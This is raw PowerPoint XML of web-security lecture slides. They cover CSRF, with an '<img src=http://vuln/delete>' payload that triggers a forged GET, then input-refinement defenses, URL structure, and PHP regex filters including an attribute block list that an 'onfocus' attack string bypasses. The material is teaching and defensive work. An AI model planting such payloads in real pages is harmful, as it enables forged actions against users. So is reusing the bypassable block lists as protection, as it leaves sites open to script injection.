              <a:gd name="T9" fmla="*/ 1 60000 65536"/>
              <a:gd name="T10" fmla="*/ 2 60000 65536"/>
              <a:gd name="T11" fmla="*/ 3 60000 65536"/>
              <a:gd name="T12" fmla="*/ 27278 w 1905000"/>
              <a:gd name="T13" fmla="*/ 27278 h 558800"/>
              <a:gd name="T14" fmla="*/ 1877722 w 1905000"/>
              <a:gd name="T15" fmla="*/ 531522 h 558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000" h="558800">
                <a:moveTo>
                  <a:pt x="93135" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1905000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905000" y="465665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1905000" y="517102"/>
                  <a:pt x="1863302" y="558799"/>
                  <a:pt x="1811865" y="558800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="558800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="93135"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="41697"/>
                  <a:pt x="41697" y="0"/>
                  <a:pt x="93134" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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defTabSz="914400" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>GET /index.html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Cross-site request forgery (CSRF)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85800" y="4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350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Victim is logged into vulnerable web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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Victim visits malicious page on attacker web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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Malicious content is delivered to victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55300" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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 descr="attacker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752600"/>
            <a:ext cx="18097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 descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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303" name="Straight Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2805113" y="2116138"/>
            <a:ext cx="2924175" cy="793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8" name="Round Diagonal Corner Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3165475" y="1954213"/>
            <a:ext cx="1905000" cy="1184275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1905000 w 1905000"/>
              <a:gd name="T1" fmla="*/ 592138 h 1184275"/>
              <a:gd name="T2" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T3" fmla="*/ 1184275 h 1184275"/>
              <a:gd name="T4" fmla="*/ 0 w 1905000"/>
              <a:gd name="T5" fmla="*/ 592138 h 1184275"/>
              <a:gd name="T6" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T7" fmla="*/ 0 h 1184275"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 1 60000 65536"/>
              <a:gd name="T10" fmla="*/ 2 60000 65536"/>
              <a:gd name="T11" fmla="*/ 3 60000 65536"/>
              <a:gd name="T12" fmla="*/ 57812 w 1905000"/>
              <a:gd name="T13" fmla="*/ 57812 h 1184275"/>
              <a:gd name="T14" fmla="*/ 1847188 w 1905000"/>
              <a:gd name="T15" fmla="*/ 1126463 h 1184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000" h="1184275">
                <a:moveTo>
                  <a:pt x="197383" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1905000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905000" y="986892"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1905000" y="1095903"/>
                  <a:pt x="1816628" y="1184274"/>
                  <a:pt x="1707617" y="1184275"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="1184275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="197383"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="88371"/>
                  <a:pt x="88371" y="0"/>
                  <a:pt x="197382" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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defTabSz="914400" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP 1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;img src=http://vuln/delete&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="160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Cross-site request forgery (CSRF)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685800" y="4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350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Victim is logged into vulnerable web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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Victim visits malicious page on attacker web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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Malicious content is delivered to victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Victim involuntarily sends a request to the vulnerable web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56324" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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5" descr="attacker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752600"/>
            <a:ext cx="18097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6" descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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327" name="Straight Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="2909888"/>
            <a:ext cx="2924175" cy="650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Round Diagonal Corner Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3165475" y="3001963"/>
            <a:ext cx="1905000" cy="558800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1905000 w 1905000"/>
              <a:gd name="T1" fmla="*/ 279400 h 558800"/>
              <a:gd name="T2" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T3" fmla="*/ 558800 h 558800"/>
              <a:gd name="T4" fmla="*/ 0 w 1905000"/>
              <a:gd name="T5" fmla="*/ 279400 h 558800"/>
              <a:gd name="T6" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T7" fmla="*/ 0 h 558800"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 1 60000 65536"/>
              <a:gd name="T10" fmla="*/ 2 60000 65536"/>
              <a:gd name="T11" fmla="*/ 3 60000 65536"/>
              <a:gd name="T12" fmla="*/ 27278 w 1905000"/>
              <a:gd name="T13" fmla="*/ 27278 h 558800"/>
              <a:gd name="T14" fmla="*/ 1877722 w 1905000"/>
              <a:gd name="T15" fmla="*/ 531522 h 558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5000" h="558800">
                <a:moveTo>
                  <a:pt x="93135" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1905000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905000" y="465665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1905000" y="517102"/>
                  <a:pt x="1863302" y="558799"/>
                  <a:pt x="1811865" y="558800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="558800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="93135"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="41697"/>
                  <a:pt x="41697" y="0"/>
                  <a:pt x="93134" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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defTabSz="914400" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GET /delete</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookie: s=01a4b8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="1600"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Defenses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Methodology</a:t>
            </a:r>
            <a:endParaRPr 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Refinement</a:t>
            </a:r>
            <a:endParaRPr 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Prepared statements (SQL injection)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+mn-ea"/>
              </a:rPr>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>defenses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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Methodology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Threat and risk analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Design review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Manual and automated code review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Manual and automated testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Online monitoring (detection/prevention)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Repeat…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Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>refinement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Refine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0"/>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>user inputs that may be used in sensitive operations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Refinement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>is context-dependent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HTML element content</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;/span&gt;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HTML attribute value</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;span class=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”&gt;…&lt;/span&gt;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JavaScript data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;/span&gt;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CSS value</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>span a:hover { color: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier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URL value</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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Universal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Resource Locator (URL) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example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shows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 full URL using every possible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option:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="18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IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800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IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>fred:wilma@www.example.com/private.asp?doc=3&amp;part=4#footer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IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>user ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1"/>
              <a:t>fred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>, whose password is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1"/>
              <a:t>wilma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>being passed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>server at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>That </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>server is being asked to provide the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>resource private.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>, and is passing a parameter named doc with a value of 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>parameter part with a value of 4, and then referencing an internal anchor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>or fragment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>footer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26072-8C9D-43AD-9FAE-46F36CA5EB9E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="times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 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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05200"/>
            <a:ext cx="77724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dirty="0" smtClean="0"/>
              <a:t>Use Regular expressions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/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609600" y="1905000"/>
            <a:ext cx="7848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ourier" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>www_clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ereg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>    “[^A-Za-z0-9 .-@://]”, “”, $www);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>echo $www;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0B8A-63EB-423B-980B-DAB84A6F55E1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="times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 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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7724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Problem: missing evil attribute: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>onfocus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Attack string: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>onfocus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=“malicious code”&gt;…&lt;/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRP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609600" y="1905000"/>
            <a:ext cx="78486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urier" charset="0"/>
              </a:rPr>
              <a:t>function removeEvilAttributes($tag) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  $stripAttrib = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF000E"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>‘javascript:|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup|style|onload|onchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  return preg_replace(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>    “/$stringAttrib/i”, “forbidden”, $tag);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier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3D77-EAE4-4C1E-B402-43FD12010BC7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="times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 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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09600" y="1905000"/>
            <a:ext cx="78486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ourier" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>removeEvilAttributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>($tag) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>stripAttrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup|style|onload|onchange|onfocus’;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>    “/$</a:t>
            </a:r>
            <a:r>
